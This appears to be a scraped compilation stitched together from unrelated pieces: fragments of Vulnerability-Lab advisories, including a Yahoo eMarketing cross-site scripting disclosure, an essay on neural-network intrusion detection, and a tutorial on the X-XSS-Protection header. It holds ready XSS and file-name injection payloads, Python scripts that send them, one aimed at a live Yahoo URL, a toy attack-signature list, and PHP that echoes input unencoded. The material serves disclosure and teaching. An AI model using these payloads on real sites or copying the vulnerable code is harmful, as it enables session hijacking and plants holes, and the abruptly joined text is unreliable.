merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. 
Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
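The session log shows the whole issue lives in the multipart filename field of the upload POST. For testing against your own device (the app's wifi interface listens on localhost:52437 according to the PoC), the tampered request can be reproduced without an intercepting proxy. The sketch below is an assumption-laden Python illustration using the requests library, not part of the advisory.

# Reproduce the tampered upload from the PoC: a harmless file body, but a
# path-traversal / markup payload in the multipart filename field.
# Only point this at your own device; BASE matches the PoC's wifi interface.
import requests

BASE = "http://localhost:52437/Box/"     # from the advisory's PoC session log
HOSTILE_NAME = "../<iframe>2.png"        # filename payload; the body stays benign

def upload_with_hostile_filename():
    files = {"file": (HOSTILE_NAME, b"\x89PNG test bytes", "image/png")}
    data = {"button": "Submit"}
    return requests.post(BASE, files=files, data=data, timeout=10)

def filename_listed_unescaped():
    index = requests.get(BASE, timeout=10).text
    return "<iframe>" in index           # raw tag in the dir listing = vulnerable

if __name__ == "__main__":
    upload_with_hostile_filename()
    print("vulnerable listing" if filename_listed_unescaped() else "filename was encoded")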
-
Document Title: =============== Yahoo eMarketing Bug Bounty #31 - Cross Site Scripting Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1491 Yahoo Security ID (H1): #55395 Release Date: ============= 2015-05-07 Vulnerability Laboratory ID (VL-ID): ==================================== 1491 Common Vulnerability Scoring System: ==================================== 3.3 Product & Service Introduction: =============================== Yahoo! Inc. is an American multinational internet corporation headquartered in Sunnyvale, California. It is widely known for its web portal, search engine Yahoo! Search, and related services, including Yahoo! Directory, Yahoo! Mail, Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, online mapping, video sharing, fantasy sports and its social media website. It is one of the most popular sites in the United States. According to news sources, roughly 700 million people visit Yahoo! websites every month. Yahoo! itself claims it attracts `more than half a billion consumers every month in more than 30 languages. (Copy of the Vendor Homepage: http://www.yahoo.com ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a client-side cross site scripting web vulnerability in the official Yahoo eMarketing online service web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-03: Vendor Notification (Yahoo Security Team - Bug Bounty Program) 2015-05-05: Vendor Response/Feedback (Yahoo Security Team - Bug Bounty Program) 2015-05-06: Vendor Fix/Patch (Yahoo Developer Team) 2015-05-06: Bug Bounty Reward (Yahoo Security Team - Bug Bounty Program) 2015-05-07: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A non-persistent input validation web vulnerability has been discovered in the official Yahoo eMarketing online service web-application. The security vulnerability allows remote attackers to manipulate client-side application to browser requests to compromise user/admin session information. The vulnerability is located in the `id` value of the `eMarketing` module. Remote attackers are able to inject malicious script codes to client-side GET method application requests. Remote attackers are able to prepare special crafted web-links to execute client-side script code that compromises the yahoo user/admin session data. The execution of the script code occurs in same module context location by a mouse-over. The attack vector of the vulnerability is located on the client-side of the online service and the request method to inject or execute the code is GET. The security risk of the non-persistent cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the non-persistent cross site scripting web vulnerability requires no privileged web application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load of malicious script codes or non-persistent web module context manipulation. 
Request Method(s): [+] GET Vulnerable Module(s): [+] Yahoo > eMarketing Vulnerable Parameter(s): [+] id Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerability can be exploited by remote attackers without privilege application user account and low user interaction (click). For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC Payload(s): "onmouseenter="confirm(document.domain) (https://marketing.tw.campaign.yahoo.net/) PoC: eMarketing ID <br/> <table border="0" cellspacing="0" cellpadding="0" width="100%"> <tr> <td align="right" width="10%" > <div class="fb-like" style="overflow: hidden; " data-href="http://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01?id="onmouseenter="confirm(document.domain)" data-layout="button_count" data-action="recommend" data-show-faces="false" data-share="true"></div> </td> <td align="left" valign="bottom" width="65%" > <span style="font-size:12px; margin: 2px; font-weight:bold; color:#4d0079">?????????? ????????</span> </td> </tr> </table> --- PoC Session Logs [GET] --- Status: 200[OK] GET https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01?id=%22onmouseenter=%22confirm(document.domain) Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[text/html] Request Headers: Host[marketing.tw.campaign.yahoo.net] User-Agent[Mozilla/5.0 (X11; Linux i686; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] Cookie[_ga=GA1.5.1632823259.1428499428; s_pers=%20s_fid%3D66FF8BBF1D4DB480-10779CBEBDA57A64%7C1491837590956%3B%20s_vs%3D1%7C1428680990957%3B%20s_nr%3D1428679190961-New%7C1460215190961%3B; __qca=P0-870655898-1430085821750; _ga=GA1.2.1969841862.1430892005] X-Forwarded-For[8.8.8.8] Connection[keep-alive] Response Headers: Date[Wed, 06 May 2015 12:19:05 GMT] Server[ATS] X-Powered-By[PHP/5.3.27] Content-Type[text/html] Age[0] Connection[close] Via[http/1.1 leonpc (ApacheTrafficServer/4.2.0 [c sSf ])] Reference(s): https://marketing.tw.campaign.yahoo.net https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/ https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01?id= Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable id value in the emarketing service application of yahoo. Restrict the input and disallow special chars or script code tags to prevent further injection attacks. Security Risk: ============== The security risk of the client-side cross site scripting web vulnerability in the tw yahoo application is estimated as medium. (CVSS 3.3) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. 
Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
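The payload simply breaks out of the data-href attribute with a double quote and appends an onmouseenter handler. Since Yahoo fixed the issue on 2015-05-06, the sketch below is only a general Python illustration of the technique (request the page with a unique marker in the parameter and see whether it is reflected unencoded), not a working PoC against the live service.

# Generic reflected-parameter check: a properly encoded response would contain
# &quot; instead of the raw double quotes in the marker.
import uuid
import requests

def parameter_reflected_unencoded(url, param):
    marker = f'"x{uuid.uuid4().hex[:8]}onmouseenter="1'
    r = requests.get(url, params={param: marker}, timeout=10)
    return marker in r.text

if __name__ == "__main__":
    # Placeholder target; only test applications you are authorized to assess.
    target = "https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01"
    print(parameter_reflected_unencoded(target, "id"))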
-
Intrusion systems have been the subject of considerable research for decades to improve the inconsistencies and inadequacies of existing methods, from basic detectability of an attack to the prevention of computer misuse. It remains a challenge still today to detect and classify known and unknown malicious network activities through identification of intrusive behavioral patterns (anomaly detection) or pattern matching (misuse or signature-based detection). Meanwhile, the number of network attack incidents continues to grow. Protecting a computer network against attacks or cybersecurity threats is imperative, especially for companies that need to protect not only their own business data but also sensitive information of their clients as well as of their employees. It is not hard to see why even just one breach in data security from a single intrusion of a computer network could wreak havoc on the entire organization. Not only would it question the reliability of the networks’ infrastructure, but it could also seriously damage the business’s reputation. An organization’s first defense against breaches is a well-defined corporate policy and management of systems, as well as the involvement of users in protecting the confidentiality, integrity, and availability of all information assets. Security awareness training is a baseline for staff to gain the knowledge necessary to deter computer breaches and viruses, mitigate the risks associated with malicious attacks, and defend against constantly evolving threats. Users’ awareness and strict IT policies and procedures can help defend a company from attacks, but when a malicious intrusion is attempted, technology is what helps systems administrators protect IT assets. When it comes to perimeter data security, traditional defense mechanisms should be in layers: firewalls, intrusion detection systems (IDS) and intrusion prevention systems (IPS) can be used. Research and new developments in the field of IDPS (Intrusion Detection and Prevention System) prove different approaches to anomaly and misuse detection can work effectively in practical settings, even without the need of human interaction/supervision in the process. Several case studies emphasize that the use of Artificial Neural Networks (ANN) can establish general patterns and identify attack characteristics in situations where rules are not known. A neural network approach can adapt to certain constraints, learn system characteristics, recognize patterns and compare recent user actions to the usual behavior; this allows resolving many issues/problems even without human intervention. The technology promises to detect misuse and improve the recognition of malicious events with more consistency. A neural network is able to detect any instances of possible misuse, allowing system administrators to protect their entire organization through enhanced resilience against threats. This article explores Artificial Intelligence (AI) as a means to solve the difficulties in identifying intrusions of insecure networks, such as the Internet, and discusses the use of artificial neural networks (ANN) for effective intrusion detection to detect patterns that separate attacks from genuine traffic. It will clarify why ANN technology offers a promising future in the identification of instances of misuse against computer systems. 
Furthermore, the article will also point out the different directions in which research on neural networks concentrate and the developments and expected future in the intrusion detection and prevention (IDPS) field. IDS & IPS Technology: Detection and Prevention Techniques With computer intrusions—the unauthorized access or malicious use of information resources—becoming more common and a growing challenge to overcome, IT professionals have come to rely more on detection and prevention technologies to protect availability of business-critical information resources and to safeguard data confidentiality and integrity. IDS tools sniff network packet traffic in search of interferences from external sources and can spot a hacker attempting to gain entry; they are designed to detect threats, misuse or unauthorized access to a system or network and are able to analyze system events for signs of incidents. Using both hardware and software, IDSs can detect anything that is suspicious either on a network or host; they then create alarms that system administrators can review to spot possible malicious entries. Intrusion detection systems (IDS) can be classified as: Host based or Network based with the former checking individual machines’ logs and the latter analyzing the content of network packets; Online or Offline, capable of flagging a threat in real-time or after the fact to alert of a problem; Misuse-based or Anomaly-based, either specifically checking a deviation from a routine behavior or comparing activities with normal, known attackers’ behavior. While an IDS is designed to detect attacks and alert humans to any malicious events to investigate, an IPS is used to prevent malicious acts or block suspicious traffic on the network. There are four different types of IPS: network-based intrusion prevention system (NIPS) that looks at the protocol activity to spot suspicious traffic; wireless intrusion prevention system (WIPS) that analyzes wireless networking protocols and is so important in the BYOD and mobile-centric world; network behavior analysis (NBA) that can spot attacks that create unusual traffic, such as distributed denial of service (DDoS) attacks, and it can use anomaly-based detection and stateful protocol analysis; and host-based intrusion prevention system (HIPS) that can be installed on single machines and can use signature-based and anomaly-based methods to detect problems. IDS and IPS tools are often used concurrently, as they are not mutually exclusive. Thus IDPS can offer twice the protection. Security technologist and chief technology officer of Co3 Systems Bruce Schneier mentions, “Good security is a combination of protection, detection, and response.” That just happens to be what IDPS does; it is deployed for information gathering, logging, detection and prevention. These tools provide threat identification capabilities, attack anticipation, and more. Having a network-based IDPS (NIDPS) with signature-based and anomaly-based detection capabilities allows inspecting the content of all the traffic that traverses the network. NIDPS are essential network security appliances that help in maintaining the security goals. 
They are highly used, as Indraneel Mukhopadhyay explains, for “identifying possible incidents, logging information about them, attempting to stop them, and reporting them to security administrators.” The all familiar Snort—an open-source NIDPS—is a highly used free threat intelligence program, created by Martin Roesch in 1998, that is capable of real-time traffic analysis and packet logging; it utilizes a rules-based detection engine to look for anomalous activity. What makes it a popular choice is its easy-to-use rule language. It can protect even the largest enterprise networks. Snort is an IP-centric program; administrators can view system security logs and find any irregularities or issues relating to things such as improper access patterns. Snort is said to be the most widely deployed intrusion prevention system in the world. Deploying IDS and IPS devices requires a specialized skill set to ensure it properly identifies abnormal traffic and alert network administrator as needed. Along with proper configuration to a predefined rule set, provided by the administrator, these devices need to be fine-tuned (as new threats are discovered) in order to weed out false positives and be adjusted to specific network parameters (when the infrastructure has been altered) to maximize accuracy. Once the type of IDPS technology has been selected, it is key to determine how many components (sensors, agents) will need to be deployed to function accurately to capture security issues, process events and alert appropriate personnel of suspicious activities. Direct network monitoring of the IDPS components like inline sensors between the firewall and the Internet border router is essential to achieve detection and prevention of malicious activity, such as denial of service attacks committed by an intruder. IDPS agents installed on endpoints can not only monitor the current network but also can assign appropriate priorities to alerts. Past and Present of IDSs IDPSs are able to monitor the events of interests on the systems and/or networks and are then able to identify possible incidents, log information about them, and attempt to stop common attacks and report them to security administrators. In the past, Intrusion Detection and Prevention (IDPS) has either been signature-based (able to check activity against known attackers’ patterns, the signature), anomaly-based (also referred to as heuristic, that alerts when traffic and activity are not normal), or based on stateful protocol analysis that looks at the “state” in a connection and “remembers” significant events that occur. These methods are effective but do have some downfalls. IDSs are known to have two main problems: the number of alarms generated and the need for tuning. Anomaly-based detection, for example, needs training and if issues arise during the training period a malicious behavior might be “learned” as legitimate by the system; it’s also prone to many false positives. When analysis is based on rules provided by a vendor or an administrator, instead, updates must be frequent to ensure the proper functioning of the system. The number of alarms generated (many being false) can overwhelm system security managers and prevent them from quickly identifying real ones. The continuous tuning of the intrusion to detect the slightest of variances and training required in order to maintain sufficient performance remains an issue. 
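Signature-based engines such as Snort ultimately match traffic against a set of known-bad patterns and raise an alert on a hit. The toy Python sketch below (not Snort's rule language or engine) shows that core idea and, implicitly, the downfall discussed above: it can only flag what is already in its signature list, and every new threat requires another rule.

# Toy signature-based detector: flag payloads that contain any known-bad pattern.
# Real engines add protocol decoding, rule options and stateful inspection on top.
SIGNATURES = {
    "directory traversal": b"../..",
    "classic SQL injection": b"' OR '1'='1",
    "PHP web shell marker": b"<?php eval(",
}

def match_signatures(payload: bytes):
    """Return the names of all signatures found in a single payload."""
    return [name for name, pattern in SIGNATURES.items() if pattern in payload]

if __name__ == "__main__":
    samples = [
        b"GET /index.html HTTP/1.1",
        b"GET /../../etc/passwd HTTP/1.1",
        b"username=admin' OR '1'='1&password=x",
    ]
    for pkt in samples:
        hits = match_signatures(pkt)
        print("ALERT" if hits else "ok   ", hits, pkt[:40])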
With a growing number of intrusion events, there is the need to use innovative intrusion detection techniques for critical infrastructure network protection. Research has concentrated on Artificial Neural Networks (ANNs) that can provide a more flexible approach to intrusion prevention in terms of learning. As the need for reliable automatic IDPS builds up, for it to gain acceptance as a viable alternative, it needs to function at a sufficient level of accuracy. That is where Neural Networks and Artificial Intelligence can play an effective role in the improvement of ID systems with the ability to learn from previous episodes of intrusion to identify new types of attack with less analyst interaction with the ID itself. In fact, information system experts believe that Artificial Intelligence (AI) can provide significant improvements to IDS/IPS systems, especially in terms of effectiveness and decreased false positive/negative rates, a major issue in intrusion management. Next Generation Intrusion Detection and Prevention (IDPS) Due to a new generation of hackers that are better organized and equipped than in the past, to get past perimeter security, it is clear that a different approach is required, says Joshua Crumbaugh, lead penetration tester at Tangible Security, Inc., NagaSec. As per the DRAFT Special Publication 800-94 Revision 1, Guide to …, the Next-Generation IDPS for host and network-based deployment options will have automated identification, location, isolation, and resolution of threats in real-time. A GCN staff post, “What’s next in cybersecurity automation,” provides insight on the Enterprise Automated Security Environment (EASE) concept for “shared situational awareness in cyber-relevant time” and, with the concerted efforts of government and private sector interests, the concept may foster continuous innovation for cyberspace defense across the board. Other than EASE, the US Government has already evaluated other options to defend against cyber-attacks that mine homeland security. It pursued, for example, as a project to develop a smart network of sensors (named Einstein) to detect cyber-attacks against critical infrastructures. IPS/IDS has changed, as research shows, with AI techniques that have improved IDSs by making them capable of detecting both current and future intrusion attacks while triggering fewer false positives and negatives. New ANNIDS (Neural networks applied to IDS) techniques have been able to improve the way detection systems are trained to recognize patterns, conduct problem solving and fault diagnosis too. In today’s world, there is the need “for building high-speed, reliable, robust and scalable ANN-based network intrusion detection and prevention system that is highly useful for [humankind] and organizations,” Mukhopadhyay says. Neural network based AIs are able to discover emergent collective properties that are too complex to be noticed by either humans or other computer techniques. AI based techniques are used to classify behavior patterns of a user and an intruder in a way that minimizes false alarms from happening, explains Archit Kumar, India, an M.Tech Student, Department of CSE, in a research paper for IJARCSMS. IDS based on ANN uses algorithms that can analyze the captured data and judge whether the data is intrusion or not by means of behavioral analysis of the neural computation during both learning and recall. 
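As a concrete, deliberately tiny illustration of what "an IDS based on ANN" means in practice, the sketch below trains a small multilayer perceptron on labelled connection-feature vectors and then classifies new traffic as normal or intrusive. It uses scikit-learn rather than any system cited in this article, and the four features and the data are invented for the example; real ANNIDS work uses far richer features and datasets such as KDD/NSL-KDD.

# Minimal ANN-based traffic classifier: train an MLP on synthetic feature vectors
# [duration, bytes_sent, failed_logins, distinct_ports] and label new connections.
import numpy as np
from sklearn.neural_network import MLPClassifier
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler

rng = np.random.default_rng(0)

# Synthetic "normal" traffic: short sessions, few failed logins, few ports.
normal = np.column_stack([
    rng.normal(30, 10, 500),      # duration (s)
    rng.normal(2000, 500, 500),   # bytes sent
    rng.poisson(0.1, 500),        # failed logins
    rng.poisson(1.0, 500),        # distinct ports touched
])
# Synthetic "attack" traffic: long sessions, many failures, port scanning.
attack = np.column_stack([
    rng.normal(300, 80, 500),
    rng.normal(90000, 20000, 500),
    rng.poisson(6.0, 500),
    rng.poisson(25.0, 500),
])

X = np.vstack([normal, attack])
y = np.array([0] * 500 + [1] * 500)   # 0 = normal, 1 = intrusion

clf = make_pipeline(
    StandardScaler(),
    MLPClassifier(hidden_layer_sizes=(16, 8), max_iter=2000, random_state=0),
)
clf.fit(X, y)

new_connections = np.array([
    [25, 1800, 0, 1],        # looks like normal browsing
    [280, 120000, 7, 30],    # looks like a scan / brute force
])
print(clf.predict(new_connections))   # should print [0 1] for this synthetic data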
Although ANNIDS’ main drawbacks are lower detection precision for low-frequency attacks and weaker detection stability in the beginning, it is a suitable solution for intrusion detection and network security, says Suresh Kashyap, an Indian research scholar at the Dr. C.V. Raman University. He adds that ANNIDS can be trained and tested with customized datasets, enabling it to identify known and unknown (new) attacks with increasing accuracy where other methods fail. Current AI techniques for improving automation of the intrusion detection process are not easily deployable in real life, yet many experiments and tests have been carried out, with results showing ANNs capable of detecting intrusive activity in a distributed environment and providing local “threat-level” monitoring of DDoS attacks before the successful completion of an intrusion.

ANNs are great in terms of learning capabilities and effectiveness in capturing anomalies in activities, but they also have some significant downfalls, such as the requirement for high computational resources. Researchers have been working on resolving this issue by trying to find ways to help ANN systems process information faster and more effectively. An approach using AI techniques combined with genetic algorithms and fuzzy logic, for instance, proved well suited for detecting malicious behavior in distributed computer systems. Research has also concentrated on the possibility of clustering data into subgroups using fuzzy clustering and then applying a different ANN to each subset; results are obtained faster and are then aggregated to give a complete picture. Another method explored more recently is deploying new ANN-based intelligent hybrid IDS models for anomaly detection that combine network- and host-based technologies under a single management console. These are also applicable to many environments, from grid and cloud computing to mobile and network computers. In such an architecture, a Distributed Intrusion Detection System (DIDS) that relies on network- and host-based sensors can increase the efficiency of the system, quickly yielding abnormal-data findings determined by multiple heterogeneous recognition engines and management components to solve security issues.

Conclusion

Whether it is through a hybrid IDS using honeypot technology and anomaly detection, or through artificial neural network (ANN) based IDS techniques, it is essential to detect and prevent attacks as soon as they are attempted. Information security practitioners suggest that organizations are confident the security control mechanisms they have in place are sufficient for the protection of computer data and programs, but apparently, as per the PwC findings from the 2014 US State of Cybercrime Survey, a good majority of them fail to assess for threats or to place emphasis on prevention mechanisms. What’s more, they also lack the ability to diagnose and troubleshoot less sophisticated attacks and have yet to consider where IDS/IPS fits in their security plan. Both system solutions work together and form an integral part of a robust network defense. As per the annual Worldwide Infrastructure Security Report (WISR), which provides insight into the global threat landscape, organizations will face even more concerns regarding APTs, so they ought to step up their network security defenses with near-real-time intrusion detection to defend critical data and applications from today’s sophisticated attacks.
The new reality in IT security is that network breaches are inevitable, and the ability to monitor and control access, behavior patterns and misuse relies on intrusion detection and prevention methods so that incidents can be identified more quickly and addressed more effectively. An IDS/IPS is a must-have device, and an ANN model based on ESNN learning patterns and classifying intrusion data packets is an effective approach. The main advantages of ANNs over traditional IDSs are their abilities to learn, classify and process information faster, as well as their ability to self-organize. For these reasons, neural networks can increase the accuracy and efficiency of IDSs, and AI techniques can improve IDS/IPS effectiveness.

References

Brecht, D. (2010, April 15). Network Intrusion Detection Systems: a 101. Retrieved from What is a Network Intrusion Detection System (NIDS)?
Compare Business Products (2014, March 18). Security: IDS vs. IPS Explained. Retrieved from Security: IDS vs. IPS Explained | Reviews, Comparisons and Buyer's Guides
GCN. (2014, December 9). What’s next in cybersecurity automation. Retrieved from What’s next in cybersecurity automation -- GCN
Infosecurity Magazine. (2011, October 21). Small enterprises are suffering more intrusions, survey finds. Retrieved from Small enterprises are suffering more intrusions, survey finds - Infosecurity Magazine
InfoSight Inc. (n.d.). Intrusion Detection (IDS) & Intrusion Prevention (IPS). Retrieved from Intrusion Detection (IDS) & Intrusion Prevention (IPS) – InfoSight Inc
Kashyap, S. (2013, May). Importance of Intrusion Detection System with its Different approaches. Retrieved from http://www.ijareeie.com/upload/may/24_Importance.pdf
Kumar, A. (2014, May). Intrusion detection system using Expert system (AI) and […]. Retrieved from http://www.ijarcsms.com/docs/paper/volume2/issue5/V2I5-0064.pdf
Mukhopadhyay, I. (2014). Hardware Realization of Artificial Neural Network Based Intrusion Detection & Prevention System. Retrieved from http://file.scirp.org/Html/3-7800230_50045.htm
Onuwa, O. (2014, November 29). Improving Network Attack Alarm System: A Proposed Hybrid Intrusion Detection System Model. Retrieved from http://www.computerscijournal.org/vol7no3/improving-network-attack-alarm-system-a-proposed-hybrid-intrusion-detection-system-model/
Saied, A. (n.d.). Artificial Neural Networks in the detection of known and unknown DDoS attacks: Proof-of-Concept. Retrieved from http://www.inf.kcl.ac.uk/staff/richard/PAAMS-WASMAS_2014.pdf
Surana, S. (2014). Intrusion Detection using Fuzzy Clustering and Artificial Neural Network. Retrieved from http://www.wseas.us/e-library/conferences/2014/Gdansk/FUNAI/FUNAI-32.pdf
Vieira, K. (2010, August). Intrusion Detection for Grid and Cloud Computing. Retrieved from http://www.inf.ufsc.br/~westphal/idscloud.pdf
Wang, L. (n.d.). Artificial Neural Network for Anomaly Intrusion Detection. Retrieved from https://www.cs.auckland.ac.nz/courses/compsci725s2c/archive/termpapers/725wang.pdf
Zakaria, O. (n.d.). Identify Features and Parameters to Devise an Accurate Intrusion Detection System Using Artificial Neural Network. Retrieved from http://www.academia.edu/2612588/Identify_Features_and_Parameters_to_Devise_an_Accurate_Intrusion_Detection_System_Using_Artificial_Neural_Network
Zamani, M. (2013, December 8). Machine Learning Techniques for Intrusion Detection. Retrieved from http://arxiv.org/pdf/1312.2177.pdf

Source
-
In the previous article, we saw how we can defend against clickjacking attacks using the X-Frame-Options header. In this article, we will discuss another header: X-XSS-Protection. As in the previous article, we will first look at the vulnerable code and then attempt to defend against the attack using this header. The setup is the same as in the previous article. Once the user logs in, there is a little dashboard where the user can search for some values. Below is the code used to implement the functionality.

Vulnerable code:

<?php
session_start();
session_regenerate_id();
if(!isset($_SESSION['admin_loggedin']))
{
    header('Location: index.php');
    exit; // stop rendering the page for unauthenticated users
}
if(isset($_GET['search']))
{
    if(!empty($_GET['search']))
    {
        $text = $_GET['search'];
    }
    else
    {
        $text = "No text Entered";
    }
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Admin Home</title>
<link rel="stylesheet" href="styles.css">
</head>
<body>
<div id="home"><center>
</br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br>
You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br>
<form action="" method="GET">
<div id="search">
<text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br>
<input type="submit" value="Search" name="Search" id="but"/>
<div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div>
</div>
</form></center>
</div>
</body>
</html>

If you look closely at the above code, the application does not sanitize the user input before echoing it back, which leaves it vulnerable. Currently, there is no additional protection mechanism implemented to prevent this. We can also have a quick look at the HTTP headers.

HTTP HEADERS

HTTP/1.1 200 OK
Date: Sun, 12 Apr 2015 14:53:37 GMT
Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0
X-Powered-By: PHP/5.6.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=f94dc2ac2aa5763c636f9e75365102b5; path=/
Content-Length: 820
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

So, let us execute some simple JavaScript in the search box and see if it gets executed. Well, it seems the script is not getting executed. Let us inspect the error console and see what’s happening. It is clear from the console that the XSS Auditor in Google Chrome is preventing execution of the script. Additionally, it says that it is enabled because there is no X-XSS-Protection or Content-Security-Policy header sent by the server. We can customize this filtering by setting the X-XSS-Protection or Content-Security-Policy headers. Let us first try to disable the protection using the following line.

header("X-XSS-Protection: 0");

After adding the above line of code to our page, the page should look as shown below.
<?php
session_start();
session_regenerate_id();
header("X-XSS-Protection: 0");
if(!isset($_SESSION['admin_loggedin']))
{
    header('Location: index.php');
    exit; // stop rendering the page for unauthenticated users
}
if(isset($_GET['search']))
{
    if(!empty($_GET['search']))
    {
        $text = $_GET['search'];
    }
    else
    {
        $text = "No text Entered";
    }
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Admin Home</title>
<link rel="stylesheet" href="styles.css">
</head>
<body>
<div id="home"><center>
</br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br>
You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br>
<form action="" method="GET">
<div id="search">
<text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br>
<input type="submit" value="Search" name="Search" id="but"/>
<div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div>
</div>
</form></center>
</div>
</body>
</html>

Well, if we now load the page, it pops up an alert box as shown below. Let us also check the same page in Firefox, which pops up an alert box as expected. Now, let us change the value of this header to 1 and try again in the browser.

header("X-XSS-Protection: 1");

If you observe the HTTP headers, you can notice that the header has been enabled.

HTTP HEADERS:

HTTP/1.1 200 OK
Date: Sun, 12 Apr 2015 14:54:42 GMT
Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0
X-Powered-By: PHP/5.6.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=8dfb86b13ec9750d1f1afdfc004f5042; path=/
